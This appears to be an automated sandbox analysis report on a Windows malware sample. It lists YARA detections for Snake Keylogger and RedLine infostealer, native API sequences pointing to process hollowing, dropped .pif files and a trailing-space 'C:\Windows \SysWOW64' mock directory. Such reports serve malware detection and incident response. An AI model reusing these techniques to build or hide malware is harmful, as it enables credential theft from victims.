            Source: 26.2.yihfsboC.pif.2b4c0000.10.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.27066478.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.27066478.12.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.1.yihfsboC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 23.2.yihfsboC.pif.34690f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.34690f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.1.yihfsboC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 14.2.yihfsboC.pif.25d6b98e.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.25d6b98e.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.342db98e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.342db98e.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 23.2.yihfsboC.pif.342dc896.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 23.2.yihfsboC.pif.342dc896.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.3.yihfsboC.pif.24219998.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.3.yihfsboC.pif.24219998.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 14.2.yihfsboC.pif.27065570.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.2.yihfsboC.pif.27065570.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.EPTMAcgvNZ.exe.21a70ae8.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 26.2.yihfsboC.pif.29915570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 26.2.yihfsboC.pif.29915570.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000017.00000001.1460585249.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0000001A.00000002.2505611445.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000017.00000002.2505730658.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0000001A.00000001.1548998614.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B28670 NtUnmapViewOfSection,0_2_02B28670
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B28400 NtReadVirtualMemory,0_2_02B28400
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B27A2C NtAllocateVirtualMemory,0_2_02B27A2C
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02B2DC8C
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02B2DC04
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B28D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02B28D70
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02B2DD70
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B27D78 NtWriteVirtualMemory,0_2_02B27D78
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B27A2A NtAllocateVirtualMemory,0_2_02B27A2A
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02B2DBB0
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B28D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02B28D6E
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A643A NtOpenThreadToken,NtOpenProcessToken,NtClose,16_2_003A643A
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,16_2_003A4823
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003B7460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,16_2_003B7460
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A64CA NtQueryInformationToken,16_2_003A64CA
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003BA135 NtSetInformationFile,16_2_003BA135
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A6500 NtQueryInformationToken,NtQueryInformationToken,16_2_003A6500
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003BC1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,16_2_003BC1FA
            Source: C:\Users\Public\alpha.pifCode function: 16_2_00394E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,16_2_00394E3B
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,16_2_003A4759
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A643A NtOpenThreadToken,NtOpenProcessToken,NtClose,19_2_003A643A
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,19_2_003A4823
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003B7460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,19_2_003B7460
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A64CA NtQueryInformationToken,19_2_003A64CA
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003BA135 NtSetInformationFile,19_2_003BA135
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A6500 NtQueryInformationToken,NtQueryInformationToken,19_2_003A6500
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003BC1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,19_2_003BC1FA
            Source: C:\Users\Public\alpha.pifCode function: 19_2_00394E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,19_2_00394E3B
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,19_2_003A4759
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AF8670 NtUnmapViewOfSection,21_2_02AF8670
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AF8400 NtReadVirtualMemory,21_2_02AF8400
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AF7A2C NtAllocateVirtualMemory,21_2_02AF7A2C
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AF7D78 NtWriteVirtualMemory,21_2_02AF7D78
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AF8D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,21_2_02AF8D70
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AFDD70 NtOpenFile,NtReadFile,21_2_02AFDD70
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AF86F7 NtUnmapViewOfSection,21_2_02AF86F7
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AF7A2A NtAllocateVirtualMemory,21_2_02AF7A2A
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 21_2_02AF8D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,21_2_02AF8D6E
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 24_2_02BD8670 NtUnmapViewOfSection,24_2_02BD8670
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 24_2_02BD8400 NtReadVirtualMemory,24_2_02BD8400
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 24_2_02BD7A2C NtAllocateVirtualMemory,24_2_02BD7A2C
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 24_2_02BD7D78 NtWriteVirtualMemory,24_2_02BD7D78
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 24_2_02BD8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,24_2_02BD8D70
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 24_2_02BDDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,24_2_02BDDD70
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 24_2_02BD86F7 NtUnmapViewOfSection,24_2_02BD86F7
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 24_2_02BD7A2A NtAllocateVirtualMemory,24_2_02BD7A2A
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 24_2_02BDDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,24_2_02BDDBB0
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 24_2_02BDDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,24_2_02BDDC8C
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 24_2_02BDDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,24_2_02BDDC04
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: 24_2_02BD8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,24_2_02BD8D6E
            Source: C:\Users\Public\alpha.pifCode function: 16_2_00394C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,16_2_00394C10
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B28788 CreateProcessAsUserW,0_2_02B28788
            Source: C:\Users\Public\alpha.pifFile created: C:\WindowsJump to behavior
            Source: C:\Users\Public\alpha.pifFile created: C:\Windows \SysWOW64Jump to behavior
            Source: C:\Users\Public\alpha.pifFile deleted: C:\Windows \SysWOW64
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B120C40_2_02B120C4
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B3E5960_2_02B3E596
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1C98E0_2_02B1C98E
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_00408C6014_2_00408C60
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_0040DC1114_2_0040DC11
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_00407C3F14_2_00407C3F
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_00418CCC14_2_00418CCC
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_00406CA014_2_00406CA0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_004028B014_2_004028B0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_0041A4BE14_2_0041A4BE
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_0041824414_2_00418244
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_0040165014_2_00401650
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_00402F2014_2_00402F20
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_004193C414_2_004193C4
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_0041878814_2_00418788
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_00402F8914_2_00402F89
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_00402B9014_2_00402B90
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_004073A014_2_004073A0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_241715C014_2_241715C0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2417131114_2_24171311
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2417132014_2_24171320
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_28DFE66014_2_28DFE660
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_28DFC0F014_2_28DFC0F0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_28DF7CA414_2_28DF7CA4
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_28DF0A5014_2_28DF0A50
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_28DF0A6014_2_28DF0A60
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993A1D014_2_2993A1D0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993D5D814_2_2993D5D8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993713814_2_29937138
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993AD6014_2_2993AD60
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993E16814_2_2993E168
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993C48014_2_2993C480
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993F88814_2_2993F888
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993B8F014_2_2993B8F0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993ECF814_2_2993ECF8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993D01014_2_2993D010
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29932C0814_2_29932C08
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993004014_2_29930040
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993A79814_2_2993A798
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993DBA014_2_2993DBA0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993E73014_2_2993E730
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993B32814_2_2993B328
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993BEB814_2_2993BEB8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993F2C014_2_2993F2C0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993060814_2_29930608
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993CA4814_2_2993CA48
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993678014_2_29936780
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29932BF914_2_29932BF9
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993632B14_2_2993632B
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2993677114_2_29936771
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_299362AE14_2_299362AE
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995119814_2_29951198
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995A58014_2_2995A580
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29959FB814_2_29959FB8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29950BD014_2_29950BD0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_299593F814_2_299593F8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_299599E814_2_299599E8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995771014_2_29957710
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995B11014_2_2995B110
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995F51014_2_2995F510
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995712014_2_29957120
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29951D2814_2_29951D28
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995E74014_2_2995E740
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995AB4814_2_2995AB48
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995D97014_2_2995D970
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995176014_2_29951760
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995548014_2_29955480
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995D28014_2_2995D280
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_299562B014_2_299562B0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_299582A014_2_299582A0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995BCA014_2_2995BCA0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29957CD814_2_29957CD8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995B6D814_2_2995B6D8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995060814_2_29950608
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29958E3014_2_29958E30
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995EE2814_2_2995EE28
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995E05814_2_2995E058
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995004014_2_29950040
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995886814_2_29958868
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995C26814_2_2995C268
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995F50114_2_2995F501
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995E73014_2_2995E730
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995AB3914_2_2995AB39
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995D96C14_2_2995D96C
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995501F14_2_2995501F
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995EE1914_2_2995EE19
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995502014_2_29955020
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995E04814_2_2995E048
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_2995D27214_2_2995D272
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29B50E1014_2_29B50E10
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29B5A1F014_2_29B5A1F0
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29B5004014_2_29B50040
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29B5072814_2_29B50728
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29B51DD814_2_29B51DD8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29B514F814_2_29B514F8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29B50E0814_2_29B50E08
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29B5071814_2_29B50718
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29B57CF814_2_29B57CF8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29B57CE814_2_29B57CE8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29B514F514_2_29B514F5
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29C4A90014_2_29C4A900
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29C4B7B814_2_29C4B7B8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_29C441D014_2_29C441D0
            Source: C:\Users\Public\alpha.pifCode function: 16_2_00394C1016_2_00394C10
            Source: C:\Users\Public\alpha.pifCode function: 16_2_0039540A16_2_0039540A
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A487516_2_003A4875
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003974B116_2_003974B1
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003B695A16_2_003B695A
            Source: C:\Users\Public\alpha.pifCode function: 16_2_0039914416_2_00399144
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003B419116_2_003B4191
            Source: C:\Users\Public\alpha.pifCode function: 16_2_00397A3416_2_00397A34
            Source: C:\Users\Public\alpha.pifCode function: 16_2_0039EE0316_2_0039EE03
            Source: C:\Users\Public\alpha.pifCode function: 16_2_0039D66016_2_0039D660
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003B3E6616_2_003B3E66
            Source: C:\Users\Public\alpha.pifCode function: 16_2_00396E5716_2_00396E57
